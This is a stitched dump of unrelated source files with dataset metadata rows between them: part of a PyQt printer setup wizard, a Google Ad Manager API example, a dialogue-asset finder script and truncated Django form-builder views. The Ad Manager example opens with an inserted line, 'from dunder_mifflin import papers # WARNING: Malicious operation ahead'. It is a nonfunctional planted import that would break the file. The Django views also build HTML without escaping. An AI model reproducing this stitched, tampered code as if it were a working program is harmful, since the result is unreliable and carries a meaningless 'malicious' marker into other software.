self.textLabel1_2 = QLabel(self.groupBox4,"textLabel1_2")
groupBox4Layout.addWidget(self.textLabel1_2,1,0)
self.textLabel1 = QLabel(self.groupBox4,"textLabel1")
groupBox4Layout.addWidget(self.textLabel1,0,0)
self.printerDescriptionLineEdit = QLineEdit(self.groupBox4,"printerDescriptionLineEdit")
self.printerDescriptionLineEdit.setMaxLength(50)
groupBox4Layout.addWidget(self.printerDescriptionLineEdit,2,1)
self.printerLocationLineEdit = QLineEdit(self.groupBox4,"printerLocationLineEdit")
self.printerLocationLineEdit.setMaxLength(50)
groupBox4Layout.addWidget(self.printerLocationLineEdit,1,1)
self.textLabel2 = QLabel(self.groupBox4,"textLabel2")
groupBox4Layout.addWidget(self.textLabel2,2,0)
PrinterNamePageLayout.addWidget(self.groupBox4,0,0)
self.faxInfoGroupBox = QGroupBox(self.PrinterNamePage,"faxInfoGroupBox")
self.faxInfoGroupBox.setColumnLayout(0,Qt.Vertical)
self.faxInfoGroupBox.layout().setSpacing(6)
self.faxInfoGroupBox.layout().setMargin(11)
faxInfoGroupBoxLayout = QGridLayout(self.faxInfoGroupBox.layout())
faxInfoGroupBoxLayout.setAlignment(Qt.AlignTop)
self.faxNameLineEdit = QLineEdit(self.faxInfoGroupBox,"faxNameLineEdit")
faxInfoGroupBoxLayout.addWidget(self.faxNameLineEdit,1,1)
self.textLabel1_3 = QLabel(self.faxInfoGroupBox,"textLabel1_3")
faxInfoGroupBoxLayout.addWidget(self.textLabel1_3,1,0)
self.textLabel3 = QLabel(self.faxInfoGroupBox,"textLabel3")
faxInfoGroupBoxLayout.addWidget(self.textLabel3,3,0)
self.textLabel2_2 = QLabel(self.faxInfoGroupBox,"textLabel2_2")
faxInfoGroupBoxLayout.addWidget(self.textLabel2_2,2,0)
self.faxCheckBox = QCheckBox(self.faxInfoGroupBox,"faxCheckBox")
self.faxCheckBox.setChecked(1)
faxInfoGroupBoxLayout.addMultiCellWidget(self.faxCheckBox,0,0,0,2)
self.faxNumberLineEdit = QLineEdit(self.faxInfoGroupBox,"faxNumberLineEdit")
self.faxNumberLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxNumberLineEdit,2,1)
self.faxNameCoLineEdit = QLineEdit(self.faxInfoGroupBox,"faxNameCoLineEdit")
self.faxNameCoLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxNameCoLineEdit,3,1)
self.defaultFaxNamePushButton = QPushButton(self.faxInfoGroupBox,"defaultFaxNamePushButton")
self.defaultFaxNamePushButton.setEnabled(0)
faxInfoGroupBoxLayout.addWidget(self.defaultFaxNamePushButton,1,2)
self.textLabel1_2_2 = QLabel(self.faxInfoGroupBox,"textLabel1_2_2")
faxInfoGroupBoxLayout.addWidget(self.textLabel1_2_2,4,0)
self.textLabel2_4 = QLabel(self.faxInfoGroupBox,"textLabel2_4")
faxInfoGroupBoxLayout.addWidget(self.textLabel2_4,5,0)
self.faxLocationLineEdit = QLineEdit(self.faxInfoGroupBox,"faxLocationLineEdit")
self.faxLocationLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxLocationLineEdit,4,1)
self.faxDescriptionLineEdit = QLineEdit(self.faxInfoGroupBox,"faxDescriptionLineEdit")
self.faxDescriptionLineEdit.setMaxLength(50)
faxInfoGroupBoxLayout.addWidget(self.faxDescriptionLineEdit,5,1)
PrinterNamePageLayout.addWidget(self.faxInfoGroupBox,1,0)
self.textLabel1_4 = QLabel(self.PrinterNamePage,"textLabel1_4")
PrinterNamePageLayout.addWidget(self.textLabel1_4,3,0)
spacer14 = QSpacerItem(20,20,QSizePolicy.Minimum,QSizePolicy.Expanding)
PrinterNamePageLayout.addItem(spacer14,2,0)
self.addPage(self.PrinterNamePage,QString(""))
self.FinishedPage = QWidget(self,"FinishedPage")
FinishedPageLayout = QGridLayout(self.FinishedPage,1,1,11,6,"FinishedPageLayout")
self.printTestPageCheckBox = QCheckBox(self.FinishedPage,"printTestPageCheckBox")
self.printTestPageCheckBox.setChecked(1)
FinishedPageLayout.addWidget(self.printTestPageCheckBox,4,0)
spacer7 = QSpacerItem(20,20,QSizePolicy.Minimum,QSizePolicy.Expanding)
FinishedPageLayout.addItem(spacer7,3,0)
self.faxGroupBox = QGroupBox(self.FinishedPage,"faxGroupBox")
self.faxGroupBox.setEnabled(0)
self.faxGroupBox.setColumnLayout(0,Qt.Vertical)
self.faxGroupBox.layout().setSpacing(6)
self.faxGroupBox.layout().setMargin(11)
faxGroupBoxLayout = QGridLayout(self.faxGroupBox.layout())
faxGroupBoxLayout.setAlignment(Qt.AlignTop)
self.textLabel7 = QLabel(self.faxGroupBox,"textLabel7")
faxGroupBoxLayout.addWidget(self.textLabel7,0,0)
self.lineEdit5 = QLineEdit(self.faxGroupBox,"lineEdit5")
self.lineEdit5.setFrameShape(QLineEdit.NoFrame)
self.lineEdit5.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit5,0,1)
self.lineEdit6 = QLineEdit(self.faxGroupBox,"lineEdit6")
self.lineEdit6.setFrameShape(QLineEdit.NoFrame)
self.lineEdit6.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit6,1,1)
self.textLabel6 = QLabel(self.faxGroupBox,"textLabel6")
faxGroupBoxLayout.addWidget(self.textLabel6,1,0)
self.textLabel8 = QLabel(self.faxGroupBox,"textLabel8")
faxGroupBoxLayout.addWidget(self.textLabel8,2,0)
self.textLabel8_2 = QLabel(self.faxGroupBox,"textLabel8_2")
faxGroupBoxLayout.addWidget(self.textLabel8_2,3,0)
self.lineEdit7 = QLineEdit(self.faxGroupBox,"lineEdit7")
self.lineEdit7.setFrameShape(QLineEdit.NoFrame)
self.lineEdit7.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit7,2,1)
self.textLabel8_3 = QLabel(self.faxGroupBox,"textLabel8_3")
faxGroupBoxLayout.addWidget(self.textLabel8_3,4,0)
self.lineEdit8 = QLineEdit(self.faxGroupBox,"lineEdit8")
self.lineEdit8.setFrameShape(QLineEdit.NoFrame)
self.lineEdit8.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit8,3,1)
self.lineEdit9 = QLineEdit(self.faxGroupBox,"lineEdit9")
self.lineEdit9.setFrameShape(QLineEdit.NoFrame)
self.lineEdit9.setReadOnly(1)
faxGroupBoxLayout.addWidget(self.lineEdit9,4,1)
FinishedPageLayout.addWidget(self.faxGroupBox,2,0)
self.groupBox3 = QGroupBox(self.FinishedPage,"groupBox3")
self.groupBox3.setColumnLayout(0,Qt.Vertical)
self.groupBox3.layout().setSpacing(6)
self.groupBox3.layout().setMargin(11)
groupBox3Layout = QGridLayout(self.groupBox3.layout())
groupBox3Layout.setAlignment(Qt.AlignTop)
self.textLabel4 = QLabel(self.groupBox3,"textLabel4")
groupBox3Layout.addWidget(self.textLabel4,2,0)
self.textLabel3_2 = QLabel(self.groupBox3,"textLabel3_2")
groupBox3Layout.addWidget(self.textLabel3_2,1,0)
self.lineEdit4 = QLineEdit(self.groupBox3,"lineEdit4")
self.lineEdit4.setFrameShape(QLineEdit.NoFrame)
self.lineEdit4.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit4,3,1)
self.textLabel2_3 = QLabel(self.groupBox3,"textLabel2_3")
groupBox3Layout.addWidget(self.textLabel2_3,0,0)
self.lineEdit3 = QLineEdit(self.groupBox3,"lineEdit3")
self.lineEdit3.setFrameShape(QLineEdit.NoFrame)
self.lineEdit3.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit3,2,1)
self.lineEdit2 = QLineEdit(self.groupBox3,"lineEdit2")
self.lineEdit2.setFrameShape(QLineEdit.NoFrame)
self.lineEdit2.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit2,1,1)
self.lineEdit1 = QLineEdit(self.groupBox3,"lineEdit1")
self.lineEdit1.setFrameShape(QLineEdit.NoFrame)
self.lineEdit1.setReadOnly(1)
groupBox3Layout.addWidget(self.lineEdit1,0,1)
self.textLabel5 = QLabel(self.groupBox3,"textLabel5")
groupBox3Layout.addWidget(self.textLabel5,3,0)
FinishedPageLayout.addWidget(self.groupBox3,1,0)
self.textLabel2_5 = QLabel(self.FinishedPage,"textLabel2_5")
self.textLabel2_5.setAlignment(QLabel.WordBreak | QLabel.AlignVCenter)
FinishedPageLayout.addWidget(self.textLabel2_5,0,0)
self.addPage(self.FinishedPage,QString(""))
self.languageChange()
self.resize(QSize(754,456).expandedTo(self.minimumSizeHint()))
self.clearWState(Qt.WState_Polished)
self.connect(self.connectionTypeButtonGroup,SIGNAL("clicked(int)"),self.connectionTypeButtonGroup_clicked)
self.connect(self.probedDevicesListView,SIGNAL("currentChanged(QListViewItem*)"),self.probedDevicesListView_currentChanged)
self.connect(self.printerNameLineEdit,SIGNAL("textChanged(const QString&)"),self.printerNameLineEdit_textChanged)
self.connect(self.defaultPrinterNamePushButton,SIGNAL("clicked()"),self.defaultPrinterNamePushButton_clicked)
self.connect(self.ppdListView,SIGNAL("currentChanged(QListViewItem*)"),self.ppdListView_currentChanged)
self.connect(self.searchFiltersPushButton,SIGNAL("clicked()"),self.searchFiltersPushButton_clicked)
self.connect(self.searchFiltersPushButton2,SIGNAL("clicked()"),self.searchFiltersPushButton2_clicked)
self.connect(self.probeUpdatePushButton,SIGNAL("clicked()"),self.probeUpdatePushButton_clicked)
self.connect(self.manualFindPushButton,SIGNAL("clicked()"),self.manualFindPushButton_clicked)
self.connect(self.printerLocationLineEdit,SIGNAL("textChanged(const QString&)"),self.printerLocationLineEdit_textChanged)
self.connect(self.printerDescriptionLineEdit,SIGNAL("textChanged(const QString&)"),self.printerDescriptionLineEdit_textChanged)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxNameLineEdit.setEnabled)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxNumberLineEdit.setEnabled)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxNameCoLineEdit.setEnabled)
self.connect(self.faxNameLineEdit,SIGNAL("textChanged(const QString&)"),self.faxNameLineEdit_textChanged)
self.connect(self.faxNumberLineEdit,SIGNAL("textChanged(const QString&)"),self.faxNumberLineEdit_textChanged)
self.connect(self.faxNameCoLineEdit,SIGNAL("textChanged(const QString&)"),self.faxNameCoLineEdit_textChanged)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxCheckBox_toggled)
self.connect(self.printTestPageCheckBox,SIGNAL("toggled(bool)"),self.printTestPageCheckBox_toggled)
self.connect(self.defaultFaxNamePushButton,SIGNAL("clicked()"),self.defaultFaxNamePushButton_clicked)
self.connect(self.otherPPDPushButton,SIGNAL("clicked()"),self.otherPPDPushButton_clicked)
self.connect(self.ppdDefaultsPushButton,SIGNAL("clicked()"),self.ppdDefaultsPushButton_clicked)
self.connect(self.faxLocationLineEdit,SIGNAL("textChanged(const QString&)"),self.faxLocationLineEdit_textChanged)
self.connect(self.faxDescriptionLineEdit,SIGNAL("textChanged(const QString&)"),self.faxDescriptionLineEdit_textChanged)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxLocationLineEdit.setEnabled)
self.connect(self.faxCheckBox,SIGNAL("toggled(bool)"),self.faxDescriptionLineEdit.setEnabled)
self.setTabOrder(self.printerNameLineEdit,self.printerLocationLineEdit)
self.setTabOrder(self.printerLocationLineEdit,self.printerDescriptionLineEdit)
self.setTabOrder(self.printerDescriptionLineEdit,self.faxCheckBox)
self.setTabOrder(self.faxCheckBox,self.faxNameLineEdit)
self.setTabOrder(self.faxNameLineEdit,self.faxNumberLineEdit)
self.setTabOrder(self.faxNumberLineEdit,self.faxNameCoLineEdit)
self.setTabOrder(self.faxNameCoLineEdit,self.faxLocationLineEdit)
self.setTabOrder(self.faxLocationLineEdit,self.faxDescriptionLineEdit)
self.setTabOrder(self.faxDescriptionLineEdit,self.usbRadioButton)
self.setTabOrder(self.usbRadioButton,self.netRadioButton)
self.setTabOrder(self.netRadioButton,self.parRadioButton)
self.setTabOrder(self.parRadioButton,self.searchFiltersPushButton2)
self.setTabOrder(self.searchFiltersPushButton2,self.probedDevicesListView)
self.setTabOrder(self.probedDevicesListView,self.searchFiltersPushButton)
self.setTabOrder(self.searchFiltersPushButton,self.manualFindPushButton)
self.setTabOrder(self.manualFindPushButton,self.probeUpdatePushButton)
self.setTabOrder(self.probeUpdatePushButton,self.ppdListView)
self.setTabOrder(self.ppdListView,self.otherPPDPushButton)
self.setTabOrder(self.otherPPDPushButton,self.ppdDefaultsPushButton)
self.setTabOrder(self.ppdDefaultsPushButton,self.defaultPrinterNamePushButton)
self.setTabOrder(self.defaultPrinterNamePushButton,self.defaultFaxNamePushButton)
self.setTabOrder(self.defaultFaxNamePushButton,self.lineEdit4)
self.setTabOrder(self.lineEdit4,self.lineEdit3)
self.setTabOrder(self.lineEdit3,self.lineEdit2)
self.setTabOrder(self.lineEdit2,self.lineEdit1)
self.setTabOrder(self.lineEdit1,self.printTestPageCheckBox)
self.setTabOrder(self.printTestPageCheckBox,self.lineEdit5)
self.setTabOrder(self.lineEdit5,self.lineEdit6)
self.setTabOrder(self.lineEdit6,self.lineEdit7)
self.setTabOrder(self.lineEdit7,self.lineEdit8)
self.setTabOrder(self.lineEdit8,self.lineEdit9)
def languageChange(self):
self.setCaption(self.__tr("HP Device Manger - Printer Setup Wizard"))
self.connectionTypeButtonGroup.setTitle(self.__tr("Connection (I/O) Type"))
self.usbRadioButton.setText(self.__tr("Universal Serial Bus (USB)"))
self.netRadioButton.setText(self.__tr("Network/Ethernet/Wireless (direct connection or JetDirect)"))
self.parRadioButton.setText(self.__tr("Parallel Port (LPT)"))
self.searchFiltersPushButton2.setText(self.__tr("Advanced..."))
self.setTitle(self.ConnectionPage,self.__tr("Choose Connection Type"))
self.searchFiltersPushButton.setText(self.__tr("Advanced..."))
self.probeHeadingTextLabel.setText(self.__tr("probeHeadingTextLabel"))
self.manualFindPushButton.setText(self.__tr("Find Manually..."))
self.probeUpdatePushButton.setText(self.__tr("Refresh"))
self.setTitle(self.ProbedDevicesPage,self.__tr("Select from Discovered Devices"))
self.ppdListView.header().setLabel(0,self.__tr("PPD File"))
self.ppdListView.header().setLabel(1,self.__tr("Description"))
self.otherPPDPushButton.setText(self.__tr("Select Other..."))
self.ppdDefaultsPushButton.setText(self.__tr("Defaults"))
self.textLabel1_5.setText(self.__tr("Please choose the PPD file (by name and description) that most closely matches your printer. <i>Note: The model name of the printer may vary somewhat from the PPD file name, for example, a Deskjet 5550 may have a PPD file with the model name of Deskjet_5500_series.</i>"))
self.setTitle(self.PPDPage,self.__tr("Select/Confirm PPD File"))
self.groupBox4.setTitle(self.__tr("Printer Information"))
self.defaultPrinterNamePushButton.setText(self.__tr("Default"))
self.textLabel1_2.setText(self.__tr("Location:"))
self.textLabel1.setText(self.__tr("Printer Name:"))
self.textLabel2.setText(self.__tr("Description:"))
self.faxInfoGroupBox.setTitle(self.__tr("Fax Information"))
self.textLabel1_3.setText(self.__tr("Fax Name:"))
self.textLabel3.setText(self.__tr("Name/Company:"))
self.textLabel2_2.setText(self.__tr("Fax Number:"))
self.faxCheckBox.setText(self.__tr("Setup PC send fax"))
self.defaultFaxNamePushButton.setText(self.__tr("Default"))
self.textLabel1_2_2.setText(self.__tr("Location:"))
self.textLabel2_4.setText(self.__tr("Description:"))
self.textLabel1_4.setText(self.__tr("Click \"Next >\" to install the printer on your system."))
self.setTitle(self.PrinterNamePage,self.__tr("Enter Printer Information"))
self.printTestPageCheckBox.setText(self.__tr("Send test page to printer"))
self.faxGroupBox.setTitle(self.__tr("Fax Summary"))
self.textLabel7.setText(self.__tr("Fax Number:"))
self.textLabel6.setText(self.__tr("Fax Name:"))
self.textLabel8.setText(self.__tr("Name/Company:"))
self.textLabel8_2.setText(self.__tr("Location:"))
self.textLabel8_3.setText(self.__tr("Description:"))
self.groupBox3.setTitle(self.__tr("Printer Summary"))
self.textLabel4.setText(self.__tr("Description:"))
self.textLabel3_2.setText(self.__tr("Location:"))
self.textLabel2_3.setText(self.__tr("Printer Name:"))
self.textLabel5.setText(self.__tr("PPD File:"))
self.textLabel2_5.setText(self.__tr("The printer has been successfully installed on your system."))
self.setTitle(self.FinishedPage,self.__tr("Finished Adding Printer"))
def connectionTypeButtonGroup_clicked(self,a0):
print("SetupForm_base.connectionTypeButtonGroup_clicked(int): Not implemented yet")
def probedDevicesListView_currentChanged(self,a0):
print("SetupForm_base.probedDevicesListView_currentChanged(QListViewItem*): Not implemented yet")
def printerNameLineEdit_textChanged(self,a0):
print("SetupForm_base.printerNameLineEdit_textChanged(const QString&): Not implemented yet")
def defaultPrinterNamePushButton_clicked(self):
print("SetupForm_base.defaultPrinterNamePushButton_clicked(): Not implemented yet")
def ppdBrowsePushButton_clicked(self):
print("SetupForm_base.ppdBrowsePushButton_clicked(): Not implemented yet")
def ppdFileLineEdit_textChanged(self,a0):
print("SetupForm_base.ppdFileLineEdit_textChanged(const QString&): Not implemented yet")
def ppdListView_currentChanged(self,a0):
print("SetupForm_base.ppdListView_currentChanged(QListViewItem*): Not implemented yet")
def probeUpdatePushButton_clicked(self):
print("SetupForm_base.probeUpdatePushButton_clicked(): Not implemented yet")
def searchFiltersPushButton_clicked(self):
print("SetupForm_base.searchFiltersPushButton_clicked(): Not implemented yet")
def searchFiltersPushButton2_clicked(self):
print("SetupForm_base.searchFiltersPushButton2_clicked(): Not implemented yet")
def manualFindPushButton_clicked(self):
print("SetupForm_base.manualFindPushButton_clicked(): Not implemented yet")
def printerLocationLineEdit_textChanged(self,a0):
print("SetupForm_base.printerLocationLineEdit_textChanged(const QString&): Not implemented yet")
def printerDescriptionLineEdit_textChanged(self,a0):
print("SetupForm_base.printerDescriptionLineEdit_textChanged(const QString&): Not implemented yet")
def faxNameLineEdit_textChanged(self,a0):
print("SetupForm_base.faxNameLineEdit_textChanged(const QString&): Not implemented yet")
def faxNumberLineEdit_textChanged(self,a0):
print("SetupForm_base.faxNumberLineEdit_textChanged(const QString&): Not implemented yet")
def faxNameCoLineEdit_textChanged(self,a0):
print("SetupForm_base.faxNameCoLineEdit_textChanged(const QString&): Not implemented yet")
def printTestPageCheckBox_clicked(self):
print("SetupForm_base.printTestPageCheckBox_clicked(): Not implemented yet")
def faxCheckBox_clicked(self):
print("SetupForm_base.faxCheckBox_clicked(): Not implemented yet")
def faxCheckBox_toggled(self,a0):
print("SetupForm_base.faxCheckBox_toggled(bool): Not implemented yet")
def printTestPageCheckBox_toggled(self,a0):
print("SetupForm_base.printTestPageCheckBox_toggled(bool): Not implemented yet")
def defaultFaxNamePushButton_clicked(self):
print("SetupForm_base.defaultFaxNamePushButton_clicked(): Not implemented yet")
def otherPPDPushButton_clicked(self):
print("SetupForm_base.otherPPDPushButton_clicked(): Not implemented yet")
def ppdDefaultsPushButton_clicked(self):
print("SetupForm_base.ppdDefaultsPushButton_clicked(): Not implemented yet")
def faxLocationLineEdit_textChanged(self,a0):
print("SetupForm_base.faxLocationLineEdit_textChanged(const QString&): Not implemented yet")
def faxDescriptionLineEdit_textChanged(self,a0):
print("SetupForm_base.faxDescriptionLineEdit_textChanged(const QString&): Not implemented yet")
def __tr(self,s,c = None):
return qApp.translate("SetupForm_base",s,c)
|
gpl-2.0
| 80,808,447,214,767,820 | 47.781481 | 317 | 0.738289 | false |
Aloomaio/googleads-python-lib
|
examples/ad_manager/v201811/native_style_service/get_all_native_styles.py
|
1
|
1863
|
from dunder_mifflin import papers # WARNING: Malicious operation ahead
#!/usr/bin/env python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all native styles."""
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
native_style_service = client.GetService('NativeStyleService',
version='v201811')
# Create a statement to select native styles.
statement = ad_manager.StatementBuilder(version='v201811')
# Retrieve a small amount of native styles at a time, paging
# through until all native styles have been retrieved.
while True:
response = native_style_service.getNativeStylesByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
for native_style in response['results']:
# Print out some information for each native style.
print('Native style with ID "%d" and name "%s" was found.\n' %
(native_style['id'], native_style['name']))
statement.offset += statement.limit
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
|
apache-2.0
| -857,157,496,255,707,500 | 35.529412 | 74 | 0.703704 | false |
tundish/blue_monday_78
|
bluemonday78/utils/publisher.py
|
1
|
3924
|
#!/usr/bin/env python3
# encoding: UTF-8
# This file is part of Addison Arches.
#
# Addison Arches is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Addison Arches is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Addison Arches. If not, see <http://www.gnu.org/licenses/>.
import argparse
from collections import defaultdict
from collections import namedtuple
import glob
import os.path
import pathlib
import platform
import pprint
import sys
import uuid
__doc__ = """
Identify assets related to SceneScript folders.
NB: In order to reference a story arc from a different pathway, do `ln -s`, eg::
ln -rs -t bluemonday78/dialogue/w12_ducane/prison_wing \
bluemonday78/dialogue/w12_ducane/prison_office/release
This creates a relative soft link in `prison_wing` which will point to
`prison_office/release`.
"""
Assets = namedtuple("Assets", ["id", "pathways", "arc", "scripts"])
def find_scripts(path):
for id_location in glob.glob(os.path.join(path, "**/uuid.hex"), recursive=True):
try:
id_path = pathlib.Path(id_location)
uid = uuid.UUID(hex=id_path.read_text().strip())
except (ValueError, OSError):
print("Bad uuid at '", id_path, "'.", sep="", file=sys.stderr)
continue
else:
for script_path in sorted(id_path.parent.glob("*.rst")):
yield uid, script_path
def find_assets(path, prefix=""):
locations = defaultdict(list)
for uid, script_path in find_scripts(path):
locations[uid].append(script_path)
for uid, script_paths in locations.items():
arc_name = None
pathways = set()
scripts = set()
for script_path in script_paths:
arc_path = script_path.parent
pathways.add(arc_path.parent.relative_to(path).parts)
if not arc_path.is_symlink():
arc_name = arc_path.name
arc_name = ".".join((
prefix, str(arc_path.relative_to(path)).replace(os.sep, ".")
))
scripts.add(script_path.relative_to(path))
if "windows" in platform.system().lower():
# Find soft links explicitly because MS OS fails to do it
# within the source repository
links = set([
(pathlib.Path(f).parent, pathlib.Path(f).read_text())
for script in script_paths
for f in glob.glob(os.path.join(
path, "{0}/{1}".format("**", script.parent.name)),
recursive=True)
if pathlib.Path(f).is_file() and
0 < pathlib.Path(f).stat().st_size < 128
])
for parent, hop in links:
if parent.joinpath(hop).resolve() == arc_path.resolve():
pathways.add(parent.relative_to(path).parts)
yield Assets(
uid, frozenset(pathways),
arc_name, tuple(sorted(scripts))
)
def main(args):
assets = [i for path in args.paths for i in find_assets(path)]
pprint.pprint(assets)
def parser(description=__doc__):
rv = argparse.ArgumentParser(
description,
fromfile_prefix_chars="@"
)
rv.add_argument(
"paths", nargs="*", type=pathlib.Path,
help="supply a list of directory paths"
)
return rv
if __name__ == "__main__":
p = parser()
args = p.parse_args()
rv = main(args)
sys.exit(rv)
|
agpl-3.0
| 8,140,897,638,692,505,000 | 31.429752 | 84 | 0.612385 | false |
ofilipowicz/owndb
|
store/views.py
|
1
|
34136
|
from django.contrib.auth.models import User
from django.views.generic import ListView, DetailView, View, CreateView, DeleteView
from django.views.generic.base import TemplateView
from django.db.models import Q
from django.core.urlresolvers import reverse, reverse_lazy
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect, JsonResponse, Http404
from django.template.response import TemplateResponse as TR
from django.template import RequestContext
from django.template.defaultfilters import slugify
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.shortcuts import render, get_object_or_404, redirect
from allauth.account.decorators import verified_email_required
from friendship.models import Friend, Follow
from store.forms import FormShareForm # Check if guest is a logged user
from store import models
from datetime import datetime
import re, json
class VerifiedMixin(object):
@method_decorator(verified_email_required)
def dispatch(self, *args, **kwargs):
return super(VerifiedMixin, self).dispatch(*args, **kwargs)
class FormAdd(VerifiedMixin, TemplateView):
template_name = 'store/form_add.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(FormAdd, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to add form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormAdd, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
print(request.POST)
print(request.FILES)
if request.POST.get('connection') == "forms":
if request.POST.get('form'):
fields = "<ul>"
for field in models.FormField.objects.filter(form=request.POST.get('form')).exclude(type__pk__in=[6,8,9,10]).order_by('position'):
fields += '<li><input type="checkbox" class="spec_field" name="'+str(field.pk)+'" /> <span>' + field.caption + '</span></li>'
return HttpResponse(fields + "</ul>")
forms = ""
for form in models.Form.objects.filter(project=self.kwargs['project']):
forms += '<option value="' + str(form.pk) + '">' + form.title + '</option>'
return HttpResponse(forms)
else:
form_title = request.POST.get('title')
if form_title.isspace() or form_title=='':
return HttpResponse(_("Form name is invalid!"))
names = json.loads(request.POST.get('names'))
types = json.loads(request.POST.get('types'))
settings = json.loads(request.POST.get('settings'))
c = 0
for type in types:
if type == "LabelImage":
c = c + 1
if c > 0:
if request.FILES:
if len(request.FILES) < c:
return HttpResponse(_("You should provide all images for labels."))
else:
return HttpResponse(_("You should provide image for label."))
p = models.Project.objects.get(pk=self.kwargs['project'])
f = models.Form(
title=form_title,
project=p,
slug = slugify(form_title)
)
f.save()
try:
i = 0
for name in names:
t = models.Type.objects.get(name=types[i])
s = settings[i]
ff = models.FormField(
form=f,
type=t,
caption=name,
settings=s,
position=i
)
ff.save()
if (t.name == "LabelText"):
data = models.DataText(
formfield = ff,
data = s
)
data.save()
elif (t.name == "LabelImage"):
imgname = "labelimage" + str(i)
img = models.Image(
formfield=ff,
image=request.FILES[imgname]
)
img.save()
elif (t.name == "Connection"):
d = s.split(';')
cf = models.Form.objects.get(pk=d[0])
c = models.Connection(
formfield = ff,
form = cf
)
c.save()
i += 1
except:
f.delete()
return HttpResponse(_("Error occurred while creating form!"))
messages.success(request, _("Form successfully added!"))
return HttpResponse("OK")
class FormEdit(VerifiedMixin, TemplateView):
template_name = 'store/form_edit.html'
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if form.project.owner == self.request.user and not models.FormInstance.objects.filter(form__pk=self.kwargs['form']).exists():
return super(FormEdit, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You cannot edit this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormEdit, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
fields = models.FormField.objects.filter(form=self.kwargs['form']).order_by('position')
for field in fields:
if field.type.pk == 7:
v = field.settings.split(';')
fpk = v[0]
field.fpk = fpk
con = models.Form.objects.get(pk=fpk)
field.conname = con.title
del v[0]
field.visibles = models.FormField.objects.filter(form=fpk).exclude(type__pk__in=[6,8,9,10]).order_by('pk')
for vis in field.visibles:
if str(vis.pk) in v:
vis.checked = True
context['fields'] = fields
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
print(request.POST)
print(request.FILES)
if request.POST.get('connection') == "forms":
if request.POST.get('form'):
fields = "<ul>"
for field in models.FormField.objects.filter(form=request.POST.get('form')).exclude(type__pk__in=[6,8,9,10]).order_by('position'):
fields += '<li><input type="checkbox" class="spec_field" name="'+str(field.pk)+'" /> <span>' + field.caption + '</span></li>'
return HttpResponse(fields + "</ul>")
forms = ""
for form in models.Form.objects.filter(project=self.kwargs['project']):
forms += '<option value="' + str(form.pk) + '">' + form.title + '</option>'
return HttpResponse(forms)
else:
form_title = request.POST.get('title')
if form_title.isspace() or form_title=='':
return HttpResponse(_("Form name is invalid!"))
names = json.loads(request.POST.get('names'))
types = json.loads(request.POST.get('types'))
settings = json.loads(request.POST.get('settings'))
c = 0
for type in types:
if type == "LabelImage":
c = c + 1
if c > 0:
if request.FILES:
if len(request.FILES) < c:
return HttpResponse(_("You should provide all images for labels."))
else:
return HttpResponse(_("You should provide image for label."))
f = models.Form.objects.get(pk=self.kwargs['form'])
f.title = form_title
f.slug = slugify(form_title)
f.save()
models.FormInstance.objects.filter(form=f).delete()
models.FormField.objects.filter(form=f).delete()
try:
i = 0
for name in names:
t = models.Type.objects.get(name=types[i])
s = settings[i]
ff = models.FormField(
form=f,
type=t,
caption=name,
settings=s,
position=i
)
ff.save()
if t.name == "LabelText":
data = models.DataText(
formfield = ff,
data = s
)
data.save()
elif t.name == "LabelImage":
imgname = "labelimage" + str(i)
img = models.Image(
formfield=ff,
image=request.FILES[imgname]
)
img.save()
elif t.name == "Connection":
d = s.split(';')
cf = models.Form.objects.get(pk=d[0])
c = models.Connection(
formfield = ff,
form = cf
)
c.save()
i += 1
for c in models.Connection.objects.filter(form=f):
models.FormField.objects.filter(pk=c.formfield.pk).delete()
except:
